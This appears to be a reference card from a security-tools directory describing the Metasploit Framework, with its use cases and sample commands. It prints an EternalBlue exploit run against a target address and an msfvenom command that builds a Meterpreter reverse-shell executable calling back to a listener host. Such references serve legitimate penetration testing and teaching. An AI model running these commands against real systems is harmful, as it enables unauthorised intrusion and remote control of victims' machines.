
Metasploit Framework /meta-sploit/

Rapid7's open-source exploitation framework — thousands of exploit modules.


// what it is

Description

The standard offensive toolkit for the last 20 years. Ships with 2000+ exploits, 1000+ auxiliary modules, hundreds of payloads, and the Meterpreter post-exploit agent. Every offensive infosec course teaches it.

// use cases

What people use it for

  • Quickly exploit a known CVE during a pentest
  • Generate payloads via msfvenom
  • Catch reverse shells via multi/handler

// commands

The commands you'll type

Console launch

$ msfconsole -q

Run an exploit

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 10.0.0.5
msf6 > run

Generate Meterpreter exe

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o p.exe

// facts

category: Exploitation
platforms: LIN · WIN · MAC
license: FOSS
difficulty: Intermediate
